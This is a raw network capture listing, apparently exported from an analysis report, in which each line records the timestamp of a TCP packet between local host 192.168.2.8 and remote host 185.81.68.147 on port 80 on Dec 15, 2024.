                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.144264936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.144342899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.145082951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.145127058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.145176888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.145898104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.145936966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.146003008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.146771908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.146812916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.146863937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.147577047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.147638083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.147691965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.148427963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.148471117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.148542881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.149265051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.149307013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.149491072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.150186062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.150213957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.150228024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.151031971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.151073933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.151118994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.151853085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.151909113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.151947021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.152909994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.152946949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.152968884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.153568983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.153614044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.153759956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.154392958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.154433966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.154468060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.155097961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.155137062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.155188084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.155935049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.155981064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.156024933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.156785965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.156835079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.156850100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.157610893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.157670975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.157787085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.158413887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.158468962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.158521891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.159300089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.159342051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.159414053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.160154104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.160195112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.160202980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.160944939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.160985947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.161029100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.161798000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.161851883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.161876917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.162630081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.162673950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.162746906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.163435936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.163475990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.163546085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.164253950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.164297104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.164408922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.165076971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.165119886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.165147066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.165946960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.166014910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.166049957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.166774035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.166814089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.166868925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.167586088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.167627096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.167695045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.168427944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.168468952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.168524027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.169303894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.169346094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.169379950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.170094967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.170149088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.170203924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.170964956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.171005964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.171041965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.171791077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.171828985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.171837091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.172588110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.172629118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.172715902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.173464060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.173506975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.173549891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.174276114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.174338102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.174392939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.175113916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.175157070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.175209045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.175973892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.175988913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.176017046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.187006950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.187092066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.187167883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.187388897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.187431097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.187496901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.188391924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.188436031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.188456059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.189090014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.189132929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.189150095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.189914942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.189958096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.190028906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.190718889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.190758944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.190845966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.191541910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.191593885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.191637993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.192379951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.192423105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.192468882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.193207026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.193245888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.193305016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.194073915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.194117069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.194149971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.243330956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.333630085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.333770037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.333870888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.333962917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.334033012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.334100962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.334789038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.334882975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.334950924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.335661888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.335760117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.335825920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.336558104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.336647034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.336719036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.337292910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.337420940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.337486029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.338198900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.338288069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.338356018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.338992119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.339073896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.339140892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.339795113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.339915991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.339982986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.340651035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.340771914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.340847015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.341485977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.341590881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.341666937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.342322111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.342474937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.342547894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.343153954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.343266010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.343337059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.343981028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.344116926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.344192982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.344821930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.344944000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.345015049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.345634937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.345954895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.346029043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.346481085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.346597910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.346666098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.347323895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.347420931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.347492933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.348310947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.348426104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.348490953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.349081039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.349176884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.349220991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.349800110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.349911928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.349951982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.350672007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.350776911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.350847960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.351479053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.351634026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.351705074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.352336884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.352433920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.352485895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.353157043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.353295088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.353337049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.354002953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.354101896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.354142904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.354809046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.354952097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.354993105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.355654001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.355756044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.355794907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.356499910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.356596947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.356640100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.357330084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.357439041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.357480049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.358169079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.358264923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.358306885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.359014988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.359149933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.359242916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.359824896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.360045910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.360085964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.360661030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.360795975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.360833883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.361509085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.361598969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.361674070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.362319946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.362448931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.362503052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.363253117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.363347054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.363383055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.364048004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.364162922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.364233971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.364875078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.365107059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.365170956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.365885019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.366004944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.366075993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.366581917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.366655111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.366728067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.367378950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.367470980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.367536068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.368165016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.368262053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.368326902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.368940115 CET8049709185.81.68.147192.168.2.8
